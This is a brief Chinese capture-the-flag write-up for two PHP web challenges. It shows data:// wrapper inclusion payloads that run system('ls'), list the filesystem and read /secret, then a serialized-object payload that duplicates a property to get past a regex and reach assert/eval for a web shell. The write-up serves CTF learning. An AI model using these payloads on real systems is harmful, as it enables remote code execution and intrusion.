- warmup
传入file,检查file后缀是不是php,是就包含
用data伪协议
file=data:text/plain,<?=system(%27ls%27);?>.php
发现system()被禁用
glob看下文件
file=data:text/plain,<?php print_r(glob(‘/*‘));?>.php
file=data:text/plain,<?php print_r(file(‘/secret‘));?>.php
- cjbweb
<?php error_reporting(0); $safe="Hack me!"; class Hacker{ public $name="var_dump"; public $msg="Happy to cjb"; public function __wakeup() { global $safe; if(preg_match(‘/\d|\/|,|\([^()]*\([^()]*\)/‘,$this->msg)){ $this->name="var_dump"; $this->msg="You look dangerous!!!"; $safe="I think waf is enough."; } call_user_func($this->name,$this->msg); } public function __destruct() { global $safe; var_dump($safe); } } if(isset($_POST[‘info‘])){ $info=$_POST[‘info‘]; if(preg_match(‘/s:4:"name";s:\d:"v\w*"/‘,$info)){ unserialize($info); }else{ echo "I just love v"; } }else{ $hacker=new Hacker(); highlight_file(__FILE__); } string(8) "Hack me!"
看上去是反序列化,还有两个正则表达式
最终是传入参数,执行这个
call_user_func($this->name,$this->msg);
尝试序列化
发现第二个,对name变量限定开头第一个字母是v
这里可以再加一个变量绕过,序列化结果变量数也要加1
O:6:"Hacker":3:{s:4:"name";s:8:"var_dump";s:4:"name";s:6:"assert";s:3:"msg";s:10:"phpinfo();";}
构造
info=O:6:"Hacker":3:{s:4:"name";s:8:"var_dump";s:4:"name";s:6:"assert";s:3:"msg";s:22:"eval($_POST[‘shell‘]);";}
即可拿到shell